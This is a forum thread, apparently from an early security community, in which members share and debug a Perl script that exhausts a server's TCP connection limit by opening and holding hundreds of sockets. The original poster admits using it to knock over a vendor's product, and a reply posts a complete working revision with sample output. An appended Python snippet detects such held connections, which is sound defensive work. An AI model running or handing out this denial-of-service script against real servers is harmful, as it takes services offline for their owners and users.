Test my socket script

  1. #1
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883

    Test my socket script

    Here is a script that opens sockets to any box you specify and holds them until you release the connections. The purpose of this script is to see how many sockets a box will allow before refusing connections.

    I just used this to pound a very well known product developed by a major player in the industry. The guilty will remain anonymous.

    Anyway, I'd like to get some play on this script so go ahead and run it. Keep in mind, it will DoS a box when it hits the connection limit so *DON'T* use this on production machines unless you want to have your admin all over your ass.

    The script is written in PERL and the syntax can be found in the script. You must read the agreement first, then you'll see the syntax at the bottom.

    Any feedback is appreciated.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  2. #2
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Is this a "pull my finger" kind of thing??

    Gonna try it on FreeBSD and get back to you on it..
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  3. #3
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    Yeah, I should mention that I have tested this on:
    RH7.1 - RH9.0
    Slackware 9

    Umm, that's about it so far.

    For those who I spoke to on irc.unerror.com yesterday, yes, this is the script I used on the product I ranted about.


    UPDATE:

    Bug #1 - If you specify a number of sockets that is greater than the number the remote host can handle, the script will terminate, leaving the sockets connected for the time out period on the remote host. Normally, you'll get a prompt telling you to press enter to release the sockets if you specify a number of sockets that a box can handle. This will be fixed shortly. Stay tuned for rev 1.1.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  4. #4
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Sun Microsystems sun4u Sun Fire 280R (2 X UltraSPARC-III+) running Solaris 9, perl
    This is perl, v5.8.0 built for sun4-solaris


    Error 1, no input (usage):
    The command line args are:
    socketfill.pl IP.ADDRESS.OF.HOST PORT SOCKETS
    ie. - socketfill.pl webseal.ibm.com 443 301
    Died at ./socket.pl line 39.
    Might be more appropriate to issue an exit 0 (for no errors) rather than a die.

    Bug 2:
    /socket.pl <snip>22 300
    Opening socket 0
    Opening socket 1
    Opening socket 2
    Opening socket 3
    Opening socket 4
    Opening socket 5
    <snip>
    Opening socket 250
    Opening socket 251
    Opening socket 252
    Could not open remote socket: 253
    Can't call method "autoflush" on an undefined value at ./socket.pl line 65.

    Bug #1: Paused after socket 10, never paused again.
    Bug #2, died on can't open remote socket, doesn't appear to properly close the socket, you may wish to issue a close for the socket instead of the autoflush. I don't remember what the issue was with the autoflush, but I remember having problems with it when I wrote my spam relay detection thing.

    You might want to consider testing whether the system is up, if it is not, you might want to break out of the while loop with a last. You might even want to check to see if the socket failed to establish the connection and if so, then back off...

    Dunno, kinda wondering what you took out of the script now

    /nebulus


    EDIT: Also noticed you do no checking on your inputs...just a pet peeve of mine. You might want to look into the getopts module.

    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  5. #5
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    I got momentarily curious and played around:

    Code:
    #!/usr/bin/perl
    use Getopt::Std;
    
    # Sockets - How many sockets to open in the socket attack
    # 301 is the limit for WebSEAL since the connections start at count 0
    
    # sleeptime - amount of time in seconds to pause between tests;
    # this gives the server time to catch up instead of flooding it.
    # script will sleep after opening and before closing socket
    $sleeptime = 1;
    
    #Don't touch this line
    $dietoggle = 1;
    
    # End setting options
    ################################################################
    
    ## Main program ##
    
    # Print the usage screen if insufficient commandline arguments are 
    # presented
    $ARGC=@ARGV;
    if (! $ARGC )  { 
            print("The command line args are:\n");
            print("socketfill.pl [options]\n");
            print "-s               sleep time between multiple sockets\n";
            print "-n               number of sockets to open\n";
            print "-p               use this port on 'host'\n";
            print "-h               host\n";
            exit 0;
            }
    else
    {
            %args = ();
            getopts("s:n:p:h:", \%args);
            $args{s} = 1 unless defined $args{s};
            $args{n} = 100 unless defined $args{n};
            $args{p} = 443 unless defined $args{p};
            $args{h} = "127.0.0.1" unless defined $args{h};
            $sleeptime = $args{s};
            $socket_attack_num = $args{n};
            $remoteport = $args{p};
            $remotehost=$args{h};
    }
    
    # Begin the main app
    &sockattack;
    
    #########################
    ### Begin Subroutines ###
    #########################
    
    sub sockattack {
       use IO::Socket;
    
            $socket[0] = IO::Socket::INET->new(PeerAddr => $remotehost, PeerPort => $remoteport, Proto => "tcp", Type => SOCK_STREAM);
            if(! $socket[0] )
            {
                    print "Couldn't establish connection to $remotehost on port $remoteport, ( $! ) aborting.\n";
                    exit 1;                        # kill program, we have errors
            }
            else
            {
                    $counter = 1;
            while ($counter < $socket_attack_num)   
            {
                    $socket[$counter] = IO::Socket::INET->new
                    (
                            PeerAddr => $remotehost,
                            PeerPort => $remoteport,
                            Proto => "tcp",
                            Type => SOCK_STREAM
                    );
                   
                    if(! $socket[$counter] )
                    {
                            print "Socket connection $counter ($! ) aborted...sleeping\n";
                            sleep 3*$sleeptime;     
                            next;
                    }
                    $socket[$counter]->autoflush(1);
    
          printf("Opening socket $counter\n");
          if($counter % 10 == 0) { sleep $sleeptime; };
    #      sleep $sleeptime;
    
       }
       print("Press enter to release sockets:\n");
       $input = <STDIN>;
       foreach $s (@socket)
       {
            close ($s);
       }
       return 1;
       }
    }
    Now it behaves nicely:
    Opening socket 252
    Socket connection 253 (Too many open files ) aborted...sleeping
    Socket connection 253 (Too many open files ) aborted...sleeping


    :) :)

    /nebulus

    EDIT: Forgot to actually exit with a found exception :)


    Regardless:

    1) Now it checks to make sure it can make the first connection before making more, and if it fails, it tells you why.
    2) Defaults to a scan of localhost on 443 if you enter no options
    3) Scans options with getopts to show you what I meant...still no sanity checking of input though...got interrupted and had to quit playing with it
    4) Will attempt to sleep and wait to make more connections if it can't reach your maximum that you specify. I could have made it better, but it was only meant to be an illustration of what I meant.
    5) It doesn't bark about autoflush now and it closes all of the sockets.
    6) There is still the bug with counter off by 1, didn't get a chance to correct that.

    Anyways, would be curious to know what you think about the changes.

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  6. #6
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    Thanks for the input. Perhaps further "curiosity" by all of us will result in a nice little tool for all of us. I will add the changes and suggestions, giving those who offered them up credit in the header.

    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  7. #7
    Super Moderator
    Know-it-All Master Beaver

    Join Date
    Jan 2003
    Posts
    3,914
    Hey Hey,

    Very Nice software. I tested it against my apache server and couldn't establish a connection to the server from another source. Just to let ya know if you are keeping track of what it runs nicely on... This is a Windows XP Box and I used cygwin with perl, v5.8.0 built for cygwin-multi-64int.
    IT Blog: .:Computer Defense:.
    PnCHd (Pronounced Pinched): Acronym - Point 'n Click Hacked. As in: "That website was pinched" or "The skiddie pinched my computer because I forgot to patch".
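
Seen from the server side, the behaviour this thread tests (one client opening hundreds of connections to a port and holding them) shows up as a single peer address owning most of the established sockets on that port. The following is an added example, not code from any poster: it counts established connections per peer in `ss -tn` style output. The sample data, the documentation-range addresses, and the names `constructed_sample` and `held_connections` are constructed for illustration.

```python
from collections import Counter


def constructed_sample():
    """Constructed `ss -tn` style output for a server at 192.0.2.10."""
    lines = ["State  Recv-Q Send-Q Local Address:Port  Peer Address:Port"]
    # One client holding 300 idle connections to port 443.
    for i in range(300):
        lines.append(f"ESTAB 0 0 192.0.2.10:443 198.51.100.7:{40000 + i}")
    # Ordinary clients with one connection each.
    for i in range(5):
        lines.append(f"ESTAB 0 0 192.0.2.10:443 203.0.113.{i + 1}:51000")
    # Rows that must not be counted: wrong state, wrong local port.
    lines.append("TIME-WAIT 0 0 192.0.2.10:443 203.0.113.9:51001")
    lines.append("ESTAB 0 0 192.0.2.10:22 198.51.100.7:50022")
    return "\n".join(lines)


def held_connections(ss_output, port, threshold):
    """Return {peer_ip: count} for peers with at least `threshold`
    established connections to local `port`."""
    per_peer = Counter()
    for line in ss_output.splitlines():
        fields = line.split()
        # Expect: State Recv-Q Send-Q Local:Port Peer:Port
        if len(fields) < 5 or fields[0] != "ESTAB":
            continue
        # rsplit keeps bracketed IPv6 addresses such as [::1]:443 intact.
        local_port = fields[3].rsplit(":", 1)[-1]
        peer_ip = fields[4].rsplit(":", 1)[0]
        if local_port == str(port):
            per_peer[peer_ip] += 1
    return {ip: n for ip, n in per_peer.items() if n >= threshold}


if __name__ == "__main__":
    flagged = held_connections(constructed_sample(), port=443, threshold=100)
    for ip, count in sorted(flagged.items(), key=lambda kv: -kv[1]):
        print(f"{ip} holds {count} established connections to port 443")
```

The threshold is site-specific; compare it with the service's configured connection limit so that an alert fires well before new clients start being refused.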
